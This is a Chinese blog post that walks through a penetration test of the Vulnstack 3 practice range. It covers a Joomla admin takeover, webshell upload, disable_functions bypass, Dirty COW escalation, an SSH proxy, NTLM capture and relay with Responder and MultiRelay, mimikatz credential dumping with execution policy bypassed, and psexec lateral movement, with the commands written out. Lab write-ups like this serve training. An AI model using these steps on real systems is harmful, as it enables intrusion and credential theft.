<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <title>红日安全靶场三(vulnstack) | tkcharlotte&#39;s blog</title>
  
  

  

  <meta name="HandheldFriendly" content="True">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <!-- meta -->
  

  <!-- link -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-waves@0.7.6/dist/waves.min.css">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.6.3/css/all.min.css">
  

  

  
    <link rel="stylesheet" href="/style.css">
  

  <script>
    function setLoadingBarProgress(num) {
      document.getElementById('loading-bar').style.width=num+"%";
    }
  </script>

  
  
</head>

<body>
  
  
  <div class="cover-wrapper">
    <cover class='cover post half'>
      
        
  <h1 class='title'>tkcharlotte's blog</h1>


  <div class="m_search">
    <form name="searchform" class="form u-search-form">
      <input type="text" class="input u-search-input" placeholder="搜索" />
      <i class="icon fas fa-search fa-fw"></i>
    </form>
  </div>

<div class='menu navgation'>
  <ul class='h-list'>
    
      
        <li>
          <a class="nav home" href="/"
            
            
            id="home">
            <i class='fas fa-rss fa-fw'></i>&nbsp;文章
          </a>
        </li>
      
    
  </ul>
</div>

      
    </cover>
    <header class="l_header material">
  <div id="loading-bar-wrapper">
    <div id="loading-bar" class="material"></div>
  </div>

	<div class='wrapper'>
		<div class="nav-main container container--flex">
      <a class="logo flat-box" href='/' >
        
          tkcharlotte's blog
        
      </a>
			<div class='menu navgation'>
				<ul class='h-list'>
          
  					
  						<li>
								<a class="nav flat-box" href="/"
                  
                  
                  id="home">
									<i class='fas fa-grin fa-fw'></i>&nbsp;首页
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/categories/"
                  
                    rel="nofollow"
                  
                  
                  id="categories">
									<i class='fas fa-folder-open fa-fw'></i>&nbsp;分类
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/tags/"
                  
                    rel="nofollow"
                  
                  
                  id="tags">
									<i class='fas fa-hashtag fa-fw'></i>&nbsp;标签
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/archives/"
                  
                    rel="nofollow"
                  
                  
                  id="archives">
									<i class='fas fa-archive fa-fw'></i>&nbsp;归档
								</a>
							</li>
      			
      		
				</ul>
			</div>

			
				<div class="m_search">
					<form name="searchform" class="form u-search-form">
						<input type="text" class="input u-search-input" placeholder="搜索" />
						<i class="icon fas fa-search fa-fw"></i>
					</form>
				</div>
			
			<ul class='switcher h-list'>
				
					<li class='s-search'><a class="fas fa-search fa-fw" href='javascript:void(0)'></a></li>
				
				<li class='s-menu'><a class="fas fa-bars fa-fw" href='javascript:void(0)'></a></li>
			</ul>
		</div>

		<div class='nav-sub container container--flex'>
			<a class="logo flat-box"></a>
			<ul class='switcher h-list'>
				<li class='s-comment'><a class="flat-btn fas fa-comments fa-fw" href='javascript:void(0)'></a></li>
        
          <li class='s-toc'><a class="flat-btn fas fa-list fa-fw" href='javascript:void(0)'></a></li>
        
			</ul>
		</div>
	</div>
</header>
	<aside class="menu-phone">
    <header>
		<nav class="menu navgation">
      <ul>
        
          
            <li>
							<a class="nav flat-box" href="/archives/"
                
                  rel="nofollow"
                
                
                id="archives">
								<i class='fas fa-archive fa-fw'></i>&nbsp;文章归档
							</a>
            </li>
          
       
      </ul>
		</nav>
    </header>
	</aside>
<script>setLoadingBarProgress(40);</script>

  </div>


  <div class="l_body">
    <div class='body-wrapper'>
      <div class='l_main'>
  

  
    <article id="post" class="post white-box article-type-post" itemscope itemprop="blogPost">
      


  <section class='meta'>
    
    
    <div class="meta" id="header-meta">
      
        
  
    <h1 class="title">
      <a href="/2020/01/03/vulnstack-3/">
        红日安全靶场三(vulnstack)
      </a>
    </h1>
  


      
      <div class='new-meta-box'>
        
          
        
          
            
  <div class='new-meta-item author'>
    <a href="https://boombao.net" rel="nofollow">
      
        <i class="fas fa-user" aria-hidden="true"></i>
      
      <p>tk</p>
    </a>
  </div>


          
        
          
            <div class="new-meta-item date">
  <a class='notlink'>
    <i class="fas fa-calendar-alt" aria-hidden="true"></i>
    <p>2020-01-03</p>
  </a>
</div>

          
        
          
            
  
  <div class='new-meta-item category'>
    <a href='/categories/安全/' rel="nofollow">
      <i class="fas fa-folder-open" aria-hidden="true"></i>
      <p>安全</p>
    </a>
  </div>


          
        
          
            
  


          
        
          
            

          
        
      </div>
      
        <hr>
      
    </div>
  </section>


	  
	  
      <section class="article typo">
        <div class="article-entry" itemprop="articleBody">

			<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>红日安全的第三套靶场(<a href="http://vulnstack.qiyuanxuetang.net/vuln/detail/5/)。" target="_blank" rel="noopener">http://vulnstack.qiyuanxuetang.net/vuln/detail/5/)。</a></p>
<a id="more"></a>

<h4 id="一层"><a href="#一层" class="headerlink" title="一层"></a>一层</h4><p>出网机器为<code>web-centos</code>，重新获取的<code>ip</code>为<code>10.1.0.8</code>，攻击机<code>kali</code>，<code>ip</code>为<code>10.1.0.7</code></p>
<p>扫描一下，开了<code>80 3306 22</code> 三个端口，访问<code>80</code>端口，</p>
<p><code>joomla cms</code>,掏出<code>joomscan</code>扫一扫</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/4.png" alt></p>
<p>3.9.12版本，比较新了，没有啥比较严重的洞，发现配置文件<code>configuration.php~</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/5.png" alt></p>
<p>本地连接网站数据库，在<code>umnbt_user</code>表中可以找到管理员的账号以及加密后的密码，尝试<code>john</code>本地跑一下哈希，未果..</p>
<p>换一个思路，既然有了数据库权限，我们可以直接更新管理员密码，本地搭建环境，获取已知明文的加密后的值.</p>
<p>进后台,修改模板<code>getshell</code></p>
<p><code>Extensions -&gt; Templates -&gt; Templates</code> ,点开<code>Beez3 Details and Files</code> <code>New Files</code> 创建<code>php</code>文件</p>
<p>路径为<code>http://192.168.134.128/templates/beez3/html/shell.php</code></p>
<p>冰蝎连接之.</p>
<p>开启虚拟终端失败,在<code>disable_functions</code>中发现禁用了大部分执行命令的函数==</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/6.png" alt></p>
<p>接下来的工作就是要绕过<code>disable_function</code>，通过<code>LD_PRELOAD</code>绕过，通过冰蝎上传<code>.so</code>文件</p>
<p><a href="https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD" target="_blank" rel="noopener">https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD</a></p>
<p>尝试反弹<code>shell</code>，就是接收不到回连数据…</p>
<p>看了看当前<code>IP</code>为<code>192.168.93.120</code>，并不是<code>10.1.0.8</code>,也就是说我们当前拿下的并不是<code>cetnos</code>机器，猜测<code>centos</code>只是个反向代理，真正服务部署在内网的<code>ubuntu</code>机器上。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/7.png" alt></p>
<p><code>ubuntu</code>内核版本挺新的，木有啥提权的希望，暂时放弃，梳理思路，目前只有内网一台机器的<code>www-data</code>权限，无法提权，代理也不好上，先搜集一波信息，在<code>/tmp/mysql/test.txt</code>中发现一个<code>wwwuser</code>的用户名密码(哎哟 有点巧)</p>
<p>尝试登录<code>centos</code>，成功通过<code>ssh</code>连接到<code>centos</code>机器。内核是<code>2.6.32</code>的，符合脏牛影响范围，直接提到<code>root</code>权限。</p>
<p>在这台机器上没发现啥有用的信息，看了一下有两块网卡，内网<code>ip</code>为<code>192.168.93.100</code></p>
<p>#### </p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/10.png" alt></p>
<h4 id="内网"><a href="#内网" class="headerlink" title="内网"></a>内网</h4><p>上代理，进内网，试了试<code>ew</code>和<code>termite</code>，缺几个文件跑不起来==，直接<code>ssh</code>起<code>socks</code>代理</p>
<p><code>ssh -Nfg -D 3333 wwwuser@10.1.0.8</code></p>
<p>攻击机执行该命令，然后配置一下<code>proxychains</code>即可开启内网漫游。<code>nmap</code>扫描内网主机配合<code>smb_version</code>模块，得到以下有用信息。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">192.168.93.10	2k12			[*] Windows 6.3 Build 9600 (name:WIN-8GA56TNV3MV) (domain:TEST)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">192.168.93.20:445 WIN2008 // 1433 端口        [*] Windows 6.0 Build 6003 (name:WIN2008) (domain:TEST)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">192.168.93.30	win7			 [*] Windows 6.1 Build 7601 (name:WIN7) (domain:TEST)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">192.168.93.100 //已知centos </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">192.168.93.120 //已知ubuntu</span><br></pre></td></tr></table></figure>

<p>可能存在<code>TEST</code>域环境，扫描三台<code>windows</code>主机端口，没啥东西，<code>ms17-010</code>也不行，尝试使用已知的账号密码登录也不行，尝试爆破管理员密码，失败…</p>
<p>用跳板机中得到的<code>mysql</code>密码尝试登录<code>mssql</code>，成功登录，但不是<code>sa</code>权限，一些敏感操作做不了，<code>xp_cmdshell</code>也调用不了</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/12.png" alt></p>
<p>收集<code>mssql</code>的信息</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/13.png" alt></p>
<p>可以调用<code>xp_fileexist</code>和<code>xp_dirtree</code>,对应的模块为<code>mssql_ntlm_stealer</code>,因为机器在内网，攻击机收不到返回的<code>net ntlm hash</code>，所以需要在跳板机上通过中间人的方式获取哈希。</p>
<p>在<code>centos</code>上准备好<a href="https://github.com/lgandx/Responder" target="_blank" rel="noopener">Responder</a>(centos6默认自带python2.6  需安装 2.7以及<a href="https://www.cnblogs.com/yiruparadise/p/8193698.html" target="_blank" rel="noopener">sqlite3</a> ),获取到2008的哈希</p>
<p>第一步要修改配置文件<code>Responder.conf</code>,关闭<code>Responder</code>的<code>SMB</code>和<code>HTTP</code>服务.</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/16.png" alt></p>
<p><code>python2.7 Responder.py -I eth1 -wrf</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/14.png" alt></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/15.png" alt></p>
<p>拿到的哈希为<code>net-NTLM</code>哈希，无法直接用于哈希传递，但可以通过中继的方式达到与传递类似的目的与效果</p>
<p>中继的前提是目标的<code>SMB</code>签名需要关闭,而<code>server</code>版本一般都是开启的,而单机系统不会,可以用<code>nmap</code>扫描确定一下</p>
<p><code>nmap -Pn -sT -p 445 --open --script smb-security-mode.nse,smb-os-discovery.nse 192.168.93.0/24</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/17.png" alt></p>
<p><code>win7</code>默认没开签名,我们可以中继它.</p>
<p>在<code>centos</code>上开两个终端，一个运行<code>python2.7 Responder.py  -I eth1 -rv</code></p>
<p>另一个终端运行<code>python2.7 Multirelay.py -t 192.168.93.30 -u ALL</code></p>
<p>如果中继的用户权限较高，中继成功的话会返回一个<code>shell</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/18.png" alt><code>mimi sekurlsa::logonpasswords</code> 抓取哈希，如果抓不到明文，也可以哈希传递</p>
<p>直接抓到本地管理员明文，用该密码登录<code>win2008</code> 继续抓哈希，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains psexec.py &apos;Administrator:123qwe!ASD@192.168.93.20&apos; cmd</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20.png" alt></p>
<p><code>powershell</code>下载文件 ，抓取哈希</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%windir%/sysnative/WindowsPowerShell/v1.0/powershell.exe -ExecutionPolicy Bypass Import-Module .\mimi.ps1;Invoke-Mimikatz -Command &apos;&quot;privilege::debug&quot; &quot;sekurlsa::logonPasswords full&quot;&apos;</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/22.png" alt></p>
<p>可以直接抓到域管的明文密码，连上域控，该干啥干啥咯</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/23.png" alt></p>
<p>中继动静有点大… 学习为主… ：）</p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p><a href="https://xz.aliyun.com/t/6988/" target="_blank" rel="noopener">https://xz.aliyun.com/t/6988/</a></p>
<p><a href="https://github.com/FireFart/dirtycow/blob/master/dirty.c" target="_blank" rel="noopener">https://github.com/FireFart/dirtycow/blob/master/dirty.c</a></p>
<p><a href="https://4hou.win/wordpress/?p=24627" target="_blank" rel="noopener">https://4hou.win/wordpress/?p=24627</a></p>
<p><a href="https://klionsec.github.io/2016/07/23/llmnr-wpad/" target="_blank" rel="noopener">https://klionsec.github.io/2016/07/23/llmnr-wpad/</a></p>
<p><a href="http://drops.xmd5.com/static/drops/tips-11107.html" target="_blank" rel="noopener">http://drops.xmd5.com/static/drops/tips-11107.html</a></p>
<p><a href="https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/" target="_blank" rel="noopener">https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/</a></p>
<p><a href="https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/windows-pwnage/" target="_blank" rel="noopener">https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/windows-pwnage/</a></p>
<p><a href="https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html" target="_blank" rel="noopener">https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html</a></p>

        </div>
        
          


  <section class='meta' id="footer-meta">
    <hr>
    <div class='new-meta-box'>
      
        
          <div class="new-meta-item date" itemprop="dateUpdated" datetime="2020-01-03T14:10:01+08:00">
  <a class='notlink'>
    <i class="fas fa-clock" aria-hidden="true"></i>
    <p>最后更新于 2020年1月3日</p>
  </a>
</div>

        
      
        
          
  
  <div class="new-meta-item meta-tags"><a class="tag" href="/tags/渗透测试/" rel="nofollow"><i class="fas fa-hashtag" aria-hidden="true"></i>&nbsp;<p>渗透测试</p></a></div>


        
      
        
          

        
      
    </div>
  </section>


        
        
            <div class="prev-next">
                
                
                    <section class="next">
                        <span class="art-item-right" aria-hidden="true">
                            <h6>下一页&nbsp;<i class="fas fa-chevron-right" aria-hidden="true"></i></h6>
                            <h4>
                                <a href="/2019/11/04/vulstack-2/" rel="prev" title="对某靶场的一次测试(红日安全-vulnstack)">
                                    
                                        对某靶场的一次测试(红日安全-vulnstack)
                                    
                                </a>
                            </h4>
                            
                                
                                <h6 class="tags">
                                    <a class="tag" href="/tags/渗透测试/"><i class="fas fa-hashtag fa-fw" aria-hidden="true"></i>渗透测试</a>
                                </h6>
                            
                        </span>
                    </section>
                
            </div>
        
      </section>
    </article>
  

  
    <!-- 显示推荐文章和评论 -->



  <article class="post white-box comments">
    <section class="article typo">
      <h4><i class="fas fa-comments fa-fw" aria-hidden="true"></i>&nbsp;评论</h4>
      
      
        <section id="comments">
          <div id="lv-container" data-id="city" data-uid="MTAyMC80NTYyOC8yMjEzOQ==">
            <noscript><div><i class='fas fa-exclamation-triangle'>&nbsp;无法加载Livere评论系统，请确保您的网络能够正常访问。</div></noscript>
          </div>
        </section>
      
      
      
    </section>
  </article>


  




<!-- 根据页面mathjax变量决定是否加载MathJax数学公式js -->



  <script>
    window.subData = {
      title: '红日安全靶场三(vulnstack)',
      tools: true
    }
  </script>


</div>
<aside class='l_side'>
  
    
    
      
        
          
          
        
          
          
            
              
  <section class='widget toc-wrapper'>
    
<header class='material'>
  <div><i class="fas fa-list fa-fw" aria-hidden="true"></i>&nbsp;&nbsp;本文目录</div>
  
    <div class='wrapper'><a class="s-toc rightBtn" rel="external nofollow noopener noreferrer" href="javascript:void(0)"><i class="fas fa-thumbtack fa-fw"></i></a></div>
  
</header>

    <div class='content material'>
      <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#一层"><span class="toc-text">一层</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#内网"><span class="toc-text">内网</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参考链接"><span class="toc-text">参考链接</span></a>
    </div>
  </section>


            
          
        
          
          
        
          
          
        
          
          
        
          
          
        
      
    

  
</aside>

<footer id="footer" class="clearfix">
  
  
  <br>

  <i class="fas fa-chart-area"></i>
  <span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("07/28/2019 00:00:00");//在此处修改你的建站时间
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "本站已运行 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
setInterval("createtime()",250);
</script>
<span class="post-count"> | 字数统计：18.1k</span>
</footer>
<script>setLoadingBarProgress(80);</script>


      <script>setLoadingBarProgress(60);</script>
    </div>
    <a class="s-top fas fa-arrow-up fa-fw" href='javascript:void(0)'></a>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>

  <script>
    var GOOGLE_CUSTOM_SEARCH_API_KEY = "";
    var GOOGLE_CUSTOM_SEARCH_ENGINE_ID = "";
    var ALGOLIA_API_KEY = "";
    var ALGOLIA_APP_ID = "";
    var ALGOLIA_INDEX_NAME = "";
    var AZURE_SERVICE_NAME = "";
    var AZURE_INDEX_NAME = "";
    var AZURE_QUERY_KEY = "";
    var BAIDU_API_ID = "";
    var SEARCH_SERVICE = "hexo" || "hexo";
    var ROOT = "/"||"/";
    if(!ROOT.endsWith('/'))ROOT += '/';
  </script>

<script src="//instant.page/1.2.2" type="module" integrity="sha384-2xV8M5griQmzyiY3CDqh1dn4z3llDVqZDqzjzcY+jCBCk/a5fXJmuZ/40JJAPeoU"></script>


  <script async src="https://cdn.jsdelivr.net/npm/scrollreveal@4.0.5/dist/scrollreveal.min.js"></script>
  <script type="text/javascript">
    $(function() {
      const $reveal = $('.reveal');
      if ($reveal.length === 0) return;
      const sr = ScrollReveal({ distance: 0 });
      sr.reveal('.reveal');
    });
  </script>


  <script src="https://cdn.jsdelivr.net/npm/node-waves@0.7.6/dist/waves.min.js"></script>
  <script type="text/javascript">
    $(function() {
      Waves.attach('.flat-btn', ['waves-button']);
      Waves.attach('.float-btn', ['waves-button', 'waves-float']);
      Waves.attach('.float-btn-light', ['waves-button', 'waves-float', 'waves-light']);
      Waves.attach('.flat-box', ['waves-block']);
      Waves.attach('.float-box', ['waves-block', 'waves-float']);
      Waves.attach('.waves-image');
      Waves.init();
    });
  </script>



  <!-- fastclick -->
  <script src="https://cdn.jsdelivr.net/npm/fastclick@1.0.6/lib/fastclick.min.js"></script>
  <script>
    document.addEventListener('DOMContentLoaded', function() {
      FastClick.attach(document.body)
    }, false)
  </script>



  
  
  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-backstretch/2.0.4/jquery.backstretch.min.js"></script>
    <script type="text/javascript">
      $(function(){
        if ('.cover') {
          $('.cover').backstretch(
          ["https://github.com/tkcharlotte/notarget/blob/master/bg.jpg"],
          {
            duration: "6000",
            fade: "2500"
          });
        } else {
          $.backstretch(
          ["https://github.com/tkcharlotte/notarget/blob/master/bg.jpg"],
          {
            duration: "6000",
            fade: "2500"
          });
        }
      });
    </script>
  






  <script type="text/javascript">
    (function(d, s) {
      var j, e = d.getElementsByTagName(s)[0];
      if (typeof LivereTower === 'function') { return; }
      j = d.createElement(s);
      j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
      j.async = true;
      e.parentNode.insertBefore(j, e);
    })(document, 'script');
  </script>






  <script src="/js/app.js"></script>


  <script src="/js/search.js"></script>




<!-- 复制 -->
<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  let COPY_SUCCESS = "复制成功";
  let COPY_FAILURE = "复制失败";
  /*页面载入完成后，创建复制按钮*/
  !function (e, t, a) {
    /* code */
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '  <i class="fa fa-copy"></i><span>复制</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });

      clipboard.on('success', function(e) {
        //您可以加入成功提示
        console.info('Action:', e.action);
        console.info('Text:', e.text);
        console.info('Trigger:', e.trigger);
        success_prompt(COPY_SUCCESS);
        e.clearSelection();
      });
      clipboard.on('error', function(e) {
        //您可以加入失败提示
        console.error('Action:', e.action);
        console.error('Trigger:', e.trigger);
        fail_prompt(COPY_FAILURE);
      });
    }
    initCopyCode();

  }(window, document);

  /**
   * 弹出式提示框，默认1.5秒自动消失
   * @param message 提示信息
   * @param style 提示样式，有alert-success、alert-danger、alert-warning、alert-info
   * @param time 消失时间
   */
  var prompt = function (message, style, time)
  {
      style = (style === undefined) ? 'alert-success' : style;
      time = (time === undefined) ? 1500 : time*1000;
      $('<div>')
          .appendTo('body')
          .addClass('alert ' + style)
          .html(message)
          .show()
          .delay(time)
          .fadeOut();
  };

  // 成功提示
  var success_prompt = function(message, time)
  {
      prompt(message, 'alert-success', time);
  };

  // 失败提示
  var fail_prompt = function(message, time)
  {
      prompt(message, 'alert-danger', time);
  };

  // 提醒
  var warning_prompt = function(message, time)
  {
      prompt(message, 'alert-warning', time);
  };

  // 信息提示
  var info_prompt = function(message, time)
  {
      prompt(message, 'alert-info', time);
  };

</script>


<!-- fancybox -->
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
<script>
  let LAZY_LOAD_IMAGE = "";
  $(".article-entry").find("fancybox").find("img").each(function () {
      var element = document.createElement("a");
      $(element).attr("data-fancybox", "gallery");
      $(element).attr("href", $(this).attr("src"));
      /* 图片采用懒加载处理时,
       * 一般图片标签内会有个属性名来存放图片的真实地址，比如 data-original,
       * 那么此处将原本的属性名src替换为对应属性名data-original,
       * 修改如下
       */
       if (LAZY_LOAD_IMAGE) {
         $(element).attr("href", $(this).attr("data-original"));
       }
      $(this).wrap(element);
  });
</script>





  <script>setLoadingBarProgress(100);</script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
